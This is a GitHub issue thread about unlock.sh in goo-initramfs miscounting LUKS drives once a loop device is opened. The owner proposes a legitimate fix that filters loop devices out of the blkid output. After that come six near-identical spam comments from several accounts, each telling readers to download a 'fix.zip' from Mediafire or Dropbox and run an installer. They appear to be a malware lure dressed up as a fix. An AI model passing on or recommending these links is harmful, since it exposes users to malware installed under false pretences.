### ISSUE TITLE
inaccurate counting

### ISSUE THREAD

**Issue by west17m** [west17m/goo-initramfs#5]
drives are mis-numbered during unlock.sh

**Comment by west17m** [comment]
So ... before keyfile is decryped, we see these crypto drives:
```blkid --match-token TYPE=crypto_LUKS --output device | sort
/dev/nvme0n1p1
/dev/nvme1n1p1
/dev/nvme2n1p1
/dev/nvme3n1p1
/dev/nvme4n1p1
/dev/nvme5n1p1
/dev/nvme6n1p1
/dev/nvme7n1p1
```
Then
```cryptsetup luksOpen --readonly /root/loop.crypt key
blkid --match-token TYPE=crypto_LUKS --output device | sort
/dev/loop0
/dev/nvme0n1p1
/dev/nvme1n1p1
/dev/nvme2n1p1
/dev/nvme3n1p1
/dev/nvme4n1p1
/dev/nvme5n1p1
/dev/nvme6n1p1
/dev/nvme7n1p1
```
changing
`for _dev in $(blkid --match-token TYPE=crypto_LUKS --output device | sort)`
to
`for _dev in $(blkid --match-token TYPE=crypto_LUKS --output device | grep -v loop | sort)`

should work

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
